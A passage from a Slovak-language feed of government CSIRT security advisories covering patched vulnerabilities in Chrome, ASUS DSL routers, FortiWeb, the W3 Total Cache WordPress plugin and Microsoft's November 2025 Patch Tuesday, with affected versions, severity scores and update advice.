<li><a href="https://techcommunity.microsoft.com/blog/exchange/exchange-server-roadmap-update/4132742">https://techcommunity.microsoft.com/blog/exchange/exchange-server-roadmap-update/4132742</a></li>



<li><a href="https://techcommunity.microsoft.com/blog/exchange/exchange-server-subscription-edition-se-is-now-available/4424924">https://techcommunity.microsoft.com/blog/exchange/exchange-server-subscription-edition-se-is-now-available/4424924</a></li>



<li><a href="https://techcommunity.microsoft.com/blog/exchange/why-%E2%80%9Cin-place-upgrade%E2%80%9D-from-exchange-2019-to-exchange-se-is-low-risk/4410173">https://techcommunity.microsoft.com/blog/exchange/why-%E2%80%9Cin-place-upgrade%E2%80%9D-from-exchange-2019-to-exchange-se-is-low-risk/4410173</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2976/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Google opravil aktívne zneužívanú zero-day zraniteľnosť v prehliadači Chrome</title>
		<link>/posts/2974</link>
					<comments>/posts/2974#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 21 Nov 2025 16:12:45 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2974</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj webový prehliadač Chrome, ktoré opravujú 2 vysoko závažné zraniteľnosti, z&#160;čoho 1 je označená...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>
<p><strong>Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj webový prehliadač Chrome, ktoré opravujú 2 vysoko závažné zraniteľnosti, z&nbsp;čoho 1 je označená ako aktívne zneužívaná. CVE-2025-13223 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Chrome pre Windows vo verziách starších ako 142.0.7444.175/.176</li>



<li>Chrome pre Linux vo verziách starších ako 142.0.7444.175</li>



<li>Chrome pre Mac vo verziách starších ako 142.0.7444.176</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-13223, CVE-2025-13224 &nbsp;</strong>(CVSSv3 skóre 8,8)</p>



<p>Vysoko závažné zraniteľnosti s identifikátormi CVE-2025-13223 a CVE-2025-13224 sa nachádzajú v nástroji V8 pre JavaScript a WebAssembly a spočívajú v nesprávnom rozpoznávaní dátových typov. Vzdialený neautentifikovaný útočník by ich podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na <strong>vykonanie ľubovoľného kódu</strong> alebo <strong>zneprístupnenie služby</strong>.</p>



<p><strong>Pozn.: Zero-day CVE-2025-13223 je aktívne zneužívaná útočníkmi </strong>a&nbsp;predstavuje siedmu aktívne zneužívanú zero-day zraniteľnosť Chrome opravenú v roku 2025.CVE-2025-13224 bola objavená AI modelom Google Big Sleep.<strong></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie ľubovoľného kódu</strong></li>



<li><strong>Zneprístupnenie služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame bezodkladnú aktualizáciu prehliadača Chrome aspoň na verzie 142.0.7444.175/.176 (Windows), 142.0.7444.176 (Mac) a 142.0.7444.175 (Linux).</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://chromereleases.googleblog.com/2025/11/stable-channel-update-for-desktop_17.html">https://chromereleases.googleblog.com/2025/11/stable-channel-update-for-desktop_17.html</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-13223">https://nvd.nist.gov/vuln/detail/CVE-2025-13223</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-13224">https://nvd.nist.gov/vuln/detail/CVE-2025-13224</a></li>



<li><a href="https://thehackernews.com/2025/11/google-issues-security-fix-for-actively.html">https://thehackernews.com/2025/11/google-issues-security-fix-for-actively.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2974/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>ASUS opravil kritickú zraniteľnosť v routeroch série DSL</title>
		<link>/posts/2972</link>
					<comments>/posts/2972#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 21 Nov 2025 16:11:25 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ASUS]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DSL]]></category>
		<guid isPermaLink="false">/?p=2972</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/05/asus.png" alt="" /></p>Spoločnosť ASUS vydala bezpečnostné aktualizácie firmvéru routerov série DSL, ktoré opravujú kritickú zraniteľnosť. CVE-2025-59367 možno zneužiť na získanie neoprávneného prístupu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/05/asus.png" alt="" /></p>
<p><strong>Spoločnosť ASUS vydala bezpečnostné aktualizácie firmvéru routerov série DSL, ktoré opravujú kritickú zraniteľnosť. CVE-2025-59367 možno zneužiť na získanie neoprávneného prístupu do systému a úplné narušenie dôvernosti, integrity a dostupnosti zariadenia</strong>.</p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Routre ASUS DSL-AC51 s&nbsp;firmvérom vo verzii staršej ako 1.1.2.3_1010</li>



<li>Routre ASUS DSL-N16 s&nbsp;firmvérom vo verzii staršej ako 1.1.2.3_1010</li>



<li>Routre ASUS DSL-AC750 s&nbsp;firmvérom vo verzii staršej ako 1.1.2.3_1010</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE-2025-59367 &nbsp;</strong>(CVSS 4.0 skóre 9,3)</p>



<p>Kritická zraniteľnosť spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>neoprávnený prístup do systému</strong> a <strong>úplné narušenie dôvernosti, integrity a dostupnosti zariadenia</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať bezodkladnú aktualizáciu firmvéru zraniteľných routerov na verziu 1.1.2.3_1010. Detailné návody na <a href="https://www.asus.com/support/faq/1008000/">aktualizáciu firmvéru</a> a&nbsp;<a href="https://www.asus.com/support/faq/1039292/">odporúčania pre hardening</a> môžete nájsť na stránke výrobcu. V prípade, že aktualizáciu nie je možné vykonať, výrobca odporúča neprevádzkovať manažmentové rozhrania, port forwarding, DDNS, VPN server, DMZ, port triggering a FTP voľne dostupné z internetu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.asus.com/security-advisory">https://www.asus.com/security-advisory</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-59367">https://www.cve.org/CVERecord?id=CVE-2025-59367</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/asus-warns-of-critical-auth-bypass-flaw-in-dsl-series-routers/">https://www.bleepingcomputer.com/news/security/asus-warns-of-critical-auth-bypass-flaw-in-dsl-series-routers/</a></li>



<li><a href="https://www.asus.com/support/faq/1008000/">https://www.asus.com/support/faq/1008000/</a></li>



<li><a href="https://www.asus.com/support/faq/1039292/">https://www.asus.com/support/faq/1039292/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2972/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Fortinet opravil 2 aktívne zneužívané zraniteľnosti vo WAF FortiWeb</title>
		<link>/posts/2970</link>
					<comments>/posts/2970#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 21 Nov 2025 16:10:09 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[FortiWeb]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2970</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Fortinet vydala bezpečnostné aktualizácie svojho webového aplikačného firewallu FortiWeb, ktoré opravujú 2 aktívne zneužívané zero day zraniteľnosť. Zraniteľnosti s...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Fortinet vydala bezpečnostné aktualizácie svojho webového aplikačného firewallu FortiWeb, ktoré opravujú 2 aktívne zneužívané zero day zraniteľnosť. Zraniteľnosti s identifikátormi CVE-2025-64446 a CVE-2025-58034 možno zneužiť na získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Fortinet FortiWeb 8.0.0 až 8.0.1</li>



<li>Fortinet FortiWeb 7.6.0 až 7.6.5</li>



<li>Fortinet FortiWeb 7.4.0 až 7.4.10</li>



<li>Fortinet FortiWeb 7.2.0 až 7.2.11</li>



<li>Fortinet FortiWeb 7.0.0 až 7.0.11</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE-2025-64446 &nbsp;</strong>(CVSSv3 skóre 9,4)</p>



<p><strong>Aktívne zneužívaná kritická</strong> zraniteľnosť grafického rozhrania FortiWeb umožňujúca prechod medzi relatívnymi cestami sa nachádza v&nbsp;grafickom používateľskom rozhraní produktu. Vzdialený neautentifikovaný útočník by ju <strong>zaslaním špeciálne vytvorených požiadaviek HTTP/S</strong> mohol zneužiť na <strong>vykonávanie administratívnych príkazov</strong>.</p>



<p>Fortinet zraniteľnosť opravil už 28. októbra 2025, avšak bez pridelenia identifikátora CVE. Po zverejnení informácií o&nbsp;jej aktívnom zneužití a&nbsp; kódu demonštrujúceho mechanizmus jej zneužitia bol zraniteľnosti dodatočne pridelený CVE-2025-64446.</p>



<p><strong>CVE-2025-58034&nbsp; </strong>(CVSSv3 skóre 6,7)</p>



<p><strong>Aktívne zneužívaná</strong> CVE-2025-58034 spočíva v nesprávnej neutralizácii špeciálnych prvkov používaných v rámci príkazov operačného systému. Vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP požiadaviek alebo príkazov CLI mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame <strong>bezodkladnú aktualizáciu</strong> FortiWeb na verzie 8.0.2, 7.6.6, 7.4.11, 7.2.12, 7.0.12 alebo novšie. Okrem aktualizácie je potrebné vykonať <strong>kontrolu logov na prítomnosť pokusov o zneužitie zraniteľnosti</strong> a <strong>audit používateľských kont</strong> za účelom identifikácie neznámych účtov vytvorených útočníkom. Rovnako odporúčame administratívne rozhrania prevádzkovať úplne oddelene od internetu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://fortiguard.fortinet.com/psirt/FG-IR-25-910">https://fortiguard.fortinet.com/psirt/FG-IR-25-910</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-64446">https://www.cve.org/CVERecord?id=CVE-2025-64446</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/fortinet-confirms-silent-patch-for-fortiweb-zero-day-exploited-in-attacks/">https://www.bleepingcomputer.com/news/security/fortinet-confirms-silent-patch-for-fortiweb-zero-day-exploited-in-attacks/</a></li>



<li><a href="https://fortiguard.fortinet.com/psirt/FG-IR-25-513">https://fortiguard.fortinet.com/psirt/FG-IR-25-513</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-58034">https://nvd.nist.gov/vuln/detail/CVE-2025-58034</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-fortiweb-zero-day-exploited-in-attacks/">https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-fortiweb-zero-day-exploited-in-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2970/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť modulu WordPress W3 Total Cache umožňuje vzdialené vykonanie príkazov PHP</title>
		<link>/posts/2967</link>
					<comments>/posts/2967#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 21 Nov 2025 16:08:54 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[W3 Total Cache]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=2967</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/11/w3-total-cache-logo.png" alt="" /></p>Vývojári modulu WordPress W3 Total Cache vydali bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť. CVE-2025-9501 možno zneužiť na vzdialené vykonanie PHP...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/11/w3-total-cache-logo.png" alt="" /></p>
<p><strong>Vývojári modulu WordPress W3 Total Cache vydali bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť. CVE-2025-9501 možno zneužiť na vzdialené vykonanie PHP príkazov a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress plugin W3 Total Cache vo verziách starších ako 2.8.13</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-9501</strong>&nbsp; (CVSSv3 skóre 9,0)</p>



<p>Kritická zraniteľnosť spočíva v <strong>nedostatočnom overovaní používateľských vstupov</strong> v rámci funkcie <code>_parse_dynamic_mfunc()</code>. <strong>Vzdialený neautentifikovaný útočník</strong> by ju zaslaním špeciálne vytvoreného komentára mohol zneužiť na <strong>vzdialené vykonanie PHP príkazov</strong> a <strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>Pozn.: Výrobca vydal aktualizácie 27. októbra 2025. Kód demonštrujúci mechanizmus zneužitia zraniteľnosti bude zverejnený 24. novembra 2025.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu modulu W3 Total Cache na verziu 2.8.13. Rovnako odporúčame preveriť integritu databázy a súborov redakčného systému WordPress a logy CMS, sieťových a bezpečnostných prvkov na podozrivých komentárov a prítomnosť pokusov o&nbsp;zneužitie zraniteľnosti.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://wpscan.com/vulnerability/6697a2c9-63ae-42f0-8931-f2e5d67d45ae/">https://wpscan.com/vulnerability/6697a2c9-63ae-42f0-8931-f2e5d67d45ae/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-9501">https://nvd.nist.gov/vuln/detail/CVE-2025-9501</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/w3-total-cache-wordpress-plugin-vulnerable-to-php-command-injection/">https://www.bleepingcomputer.com/news/security/w3-total-cache-wordpress-plugin-vulnerable-to-php-command-injection/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2967/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v novembrovom balíku aktualizácií Patch Tuesday opravil 5 kritických a jednu aktívne zneužívanú zraniteľnosť</title>
		<link>/posts/2961</link>
					<comments>/posts/2961#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 13 Nov 2025 14:39:20 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2961</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala v novembri 2025 balík opráv pre portfólio svojich produktov opravujúci 63 zraniteľností, z&#160;ktorých 5 spoločnosť označila ako...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v novembri 2025 balík opráv pre portfólio svojich produktov opravujúci 63 zraniteľností, z&nbsp;ktorých 5 spoločnosť označila ako kritické. Tieto umožňujú vzdialene vykonávať kód, získať citlivé informácie a eskalovať oprávnenia. Jedna vysoko závažná zraniteľnosť je aktívne zneužívaná a&nbsp;umožňuje eskalovať oprávnenia útočníka.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Azure Monitor</li>



<li>Dynamics 365 Field Service (online)</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft Configuration Manager 2403</li>



<li>Microsoft Configuration Manager 2409</li>



<li>Microsoft Configuration Manager 2503</li>



<li>Microsoft Dynamics 365 (on-premises) version 9.1</li>



<li>Microsoft Excel 2016 (32-bit edition)</li>



<li>Microsoft Excel 2016 (64-bit edition)</li>



<li>Microsoft Office 2016 (32-bit edition)</li>



<li>Microsoft Office 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office for Android</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC 2024 for 32-bit editions</li>



<li>Microsoft Office LTSC 2024 for 64-bit editions</li>



<li>Microsoft Office LTSC for Mac 2021</li>



<li>Microsoft Office LTSC for Mac 2024</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 (GDR)</li>



<li>Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 Azure Connect Feature Pack</li>



<li>Microsoft SQL Server 2017 for x64-based Systems (CU 31)</li>



<li>Microsoft SQL Server 2017 for x64-based Systems (GDR)</li>



<li>Microsoft SQL Server 2019 for x64-based Systems (CU 32)</li>



<li>Microsoft SQL Server 2019 for x64-based Systems (GDR)</li>



<li>Microsoft SQL Server 2022 for x64-based Systems (CU 21)</li>



<li>Microsoft SQL Server 2022 for x64-based Systems (GDR)</li>



<li>Microsoft Visual Studio 2022 version 17.14</li>



<li>Microsoft Visual Studio Code CoPilot Chat Extension</li>



<li>Nuance PowerScribe 360 version 4.0.1</li>



<li>Nuance PowerScribe 360 version 4.0.2</li>



<li>Nuance PowerScribe 360 version 4.0.3</li>



<li>Nuance PowerScribe 360 version 4.0.4</li>



<li>Nuance PowerScribe 360 version 4.0.5</li>



<li>Nuance PowerScribe 360 version 4.0.6</li>



<li>Nuance PowerScribe 360 version 4.0.7</li>



<li>Nuance PowerScribe 360 version 4.0.8</li>



<li>Nuance PowerScribe 360 version 4.0.9</li>



<li>Nuance PowerScribe One version 2019.1</li>



<li>Nuance PowerScribe One version 2019.10</li>



<li>Nuance PowerScribe One version 2019.2</li>



<li>Nuance PowerScribe One version 2019.3</li>



<li>Nuance PowerScribe One version 2019.4</li>



<li>Nuance PowerScribe One version 2019.5</li>



<li>Nuance PowerScribe One version 2019.6</li>



<li>Nuance PowerScribe One version 2019.7</li>



<li>Nuance PowerScribe One version 2019.8</li>



<li>Nuance PowerScribe One version 2019.9</li>



<li>Office Online Server</li>



<li>OneDrive for Android</li>



<li>PowerScribe One version 2023.1 SP2 Patch 7</li>



<li>Visual Studio Code</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows 11 Version 25H2 for ARM64-based Systems</li>



<li>Windows 11 Version 25H2 for x64-based Systems</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>



<li>Windows Server 2025</li>



<li>Windows Server 2025 (Server Core installation)</li>



<li>Windows Subsystem for Linux GUI</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>V rámci októbrového balíka Patch Tuesday opravila spoločnosť Microsoft vo svojich produktoch 63 zraniteľností. Z nich 5 zaradila spoločnosť Microsoft do kategórie kritické a 58 bolo vyhodnotených ako vysoko závažné („Important“). Jedna z vysoko závažných je aktívne zneužívaná. Kritické zraniteľnosti umožňujú vzdialene vykonávať kód, získať citlivé informácie a eskalovať oprávnenia.</p>



<p><strong>CVE-2025-62215</strong><strong> (CVSS skóre 7,0)</strong></p>



<p><strong>Aktívne zneužívaná </strong>vysoko závažná zraniteľnosť v <strong>kerneli Windows </strong>súvisí s dvojitým uvoľnením pamäte a vzniku súbehu procesov. Umožňuje <strong>eskalovať oprávnenia na úroveň SYSTEM</strong>. Lokálny autorizovaný útočník ju môže zneužiť po výhre súbehu. Nepotrebuje interakciu obete.</p>



<p><strong>CVE-2025-</strong> <strong>30398</strong><strong> (CVSS skóre 8,1)</strong></p>



<p>Zraniteľnosť sa nachádza v produkte <strong>Nuance PowerScribe 360</strong>. Kvôli chýbajúcej kontrole autorizácie dovoľuje vzdialenému neautorizovanému útočníkovi získať <strong>prístup k citlivým používateľským informáciám a schopnosť modifikovať ich</strong>. Pre jej úspešné zneužitie potrebuje útočník počkať, kým obeť iniciuje spojenie. Následne môže vykonať volanie API za zraniteľný koncový bod.</p>



<p><strong>CVE-2025-60716</strong><strong> (CVSS skóre 7,0)</strong></p>



<p>Zraniteľnosť v <strong>jadre Windows DirectX </strong>umožňuje<strong> eskalovať oprávnenia na úroveň SYSTEM. </strong>Vyplýva z možnosti opätovného použitia dealokovanej pamäte. Lokálny útočník s nízkymi oprávneniami ju môže zneužiť po výhre súbehu. Nepotrebuje interakciu obete.</p>



<p><strong>CVE-2025-60724</strong><strong> (CVSS skóre 9,8)</strong></p>



<p>Kritická zraniteľnosť <strong>Microsoft Graphics Component (GDI+) </strong>dovoľuje <strong>vzdialené vykonávanie kódu</strong>. Súvisí s pretečením vyrovnávacej pamäte na halde, ktoré môže zneužiť vzdialený útočník bez oprávnení v systéme, bez interakcie obete. Náhľad (Preview Pane) nie je vektorom útoku.</p>



<p><strong>CVE-2025-62199</strong><strong> (CVSS skóre 7,8)</strong></p>



<p>Zraniteľnosť<strong> Microsoft Office </strong>umožňuje <strong>vykonávanie ľubovoľného kódu</strong>. Vyplýva z možnosti opätovného použitia dealokovanej pamäte. Lokálny neautorizovaný útočník ju môže zneužiť s pomocou obete, ktorá otvorí škodlivý súbor. Náhľad (Preview Pane) je tiež vektorom útoku.</p>



<p><strong>CVE-2025-</strong><strong>62214</strong><strong> (CVSS skóre 6,7)</strong></p>



<p>Zraniteľnosť produktu <strong>Visual Studio</strong> umožňuje lokálnemu útočníkovi s nízkymi oprávneniami <strong>vykonávať ľubovoľný kód</strong>. Vyplýva z nevhodnej sanitizácie používateľských príkazov. Útočník potrebuje interakciu obete, musí injektovať prompt do agenta Copilot a vyvolať kompiláciu kódu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Eskalácia oprávnení</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizácie dostupné priamo zo systému alebo zo <a href="https://msrc.microsoft.com/update-guide/">stránky výrobcu</a>. Pre konkrétny prehľad si treba vo filtroch zvoliť mesiac október a Mode „Update Tuesday“. Bližšie informácie nájdete aj <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Oct">tu</a><strong>.</strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-november-2025-patch-tuesday-fixes-1-zero-day-63-flaws/">https://www.bleepingcomputer.com/news/microsoft/microsoft-november-2025-patch-tuesday-fixes-1-zero-day-63-flaws/</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-us">https://msrc.microsoft.com/update-guide/en-us</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-62215">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-62215</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30398">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30398</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60716">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60716</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60724">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60724</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62199">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62199</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62214">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62214</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2961/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – október 2025</title>
		<link>/posts/2958</link>
					<comments>/posts/2958#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 12 Nov 2025 15:52:22 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2958</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci október 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci október 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/11/MS202510.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 10/2025 PDF (1 732 KB)</a></p>



